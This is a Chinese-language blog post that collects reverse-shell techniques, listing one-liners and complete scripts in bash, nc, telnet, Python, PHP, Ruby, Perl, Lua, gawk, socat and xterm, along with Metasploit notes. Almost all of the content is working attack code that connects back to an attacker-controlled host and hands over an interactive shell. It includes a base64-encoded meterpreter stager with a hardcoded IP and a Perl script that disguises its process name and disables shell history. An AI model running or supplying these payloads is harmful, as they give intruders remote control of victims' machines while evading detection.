反弹shell的各种姿势

bash

# 法一:
bash -i >& /dev/tcp/ip/port 0>&1
# 法二:
/bin/bash  -i > /dev/tcp/ip/port 0<&1 2>&1

exec

# 法一:
exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done
# 法二:
exec 2>&0 0<&196;exec 196<>/dev/tcp/ip/port; sh <&196 >&196 2>&196

nc(NetCat)

# 需要检查靶机是否安装nc
# 法一: 不同版本的nc不一定支持-e选项
nc -e /bin/bash ip port
# 法二:
/bin/sh | nc ip port
# 法三:
mknod backpipe p && nc ip port 0<backpipe | /bin/bash 1>backpipe
# 法四:
nc  ip 输入port  |  /bin/bash  |  nc ip 输出port
# 法五:
rm -f /tmp/p; mknod /tmp/p p && nc ip port 0/tmp/
# 法六:当nc版本问题时
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f

telnet

# 法一:同nc法二
telnet ip 输入port | /bin/bash | telnet ip 输出port
# 法二:
rm -f /tmp/p; mknod /tmp/p p && telnet ip port 0/tmp/p
# 法三:nc不可用或者/dev/tcp不可用时
mknod backpipe p && telnet ip port 0<backpipe | /bin/bash 1>backpipe

python

# 法一:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
# 法二:
python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('ip',port))\nwhile 1:  proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"
# 法三:Metasploit + python
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=ip LPORT=port
import base64; exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsMSkKcy5jb25uZWN0KCgnMTkyLjE2OC45MC4xJywxMjM0KSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdig0MDk2KQp3aGlsZSBsZW4oZCkhPWw6CglkKz1zLnJlY3YoNDA5NikKZXhlYyhkLHsncyc6c30pCg=='))

php

# 法一:
php -r 'exec("/bin/bash -i >& /dev/tcp/ip/port");'
# 法二:
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

ruby

# 法一:不常用
ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# 法二:不依赖/bin/sh
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 法三:适用windows
ruby -rsocket -e 'c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
# 法四:完整ruby反弹shell脚本(MSF模块自带)
#!/usr/bin/env ruby

require 'socket'
require 'open3'

#Set the Remote Host IP
RHOST = "192.168.1.10" 
#Set the Remote Host Port
PORT = "6667"

#Tries to connect every 20 sec until it connects.
begin
sock = TCPSocket.new "#{RHOST}", "#{PORT}"
sock.puts "We are connected!"
rescue
  sleep 20
  retry
end

#Runs the commands you type and sends you back the stdout and stderr.
begin
  while line = sock.gets
    Open3.popen2e("#{line}") do | stdin, stdout_and_stderr |
              IO.copy_stream(stdout_and_stderr, sock)
              end  
  end
rescue
  retry
end

perl

# 法一:
perl -e 'use Socket;$i="192.168.32.135";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# 法二:不依赖 /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 
# 法三:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
# 法四:完整perl反弹shell脚本
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any
        # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
    cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
    my $line = shift;
    $line .= "<p>\n";
    $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
    cgiprintpage();
    exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

lua

# 法一:
lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"
# 法二:
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('ip',port);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

Xterm(未验证)

首先开启Xserver:  # TCP 6001

Xnest :1               # Note: The command starts with uppercase X

授予目标机连回来的权限:

xterm -display 127.0.0.1:1          # Run this OUTSIDE the Xnest, another tab
xhost +targetip                         # Run this INSIDE the spawned xterm on the open X Server

如果想让任何人都连上:

xhost +                     # Run this INSIDE the spawned xterm on the open X Server

假设xterm已安装,连回你的Xserver:

xterm -display attackerip:1

或者:

$ DISPLAY=attackerip:0 xterm

gawk(未验证)

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}

socat(未验证)

tcp

接收端输入:

./socat TCP-LISTEN:ip -

发送端输入:

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ip:port

udp

socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

MSF

1.msconsole      管理生成的exp  管理反弹的shell  通过反弹的shell进行后渗透。。。。
2.msfvenom       制作木马
3.msfencode      对木马进行编码
4.Auxiliary      辅助模块
5.meterpreter    连接 

从原生的 shell 环境切换到 linux 的交互式 bash 环境

python -c 'import pty; pty.spawn("/bin/bash")'
最后修改:2020 年 08 月 15 日 10 : 00 PM
请作者喝杯奶茶吧~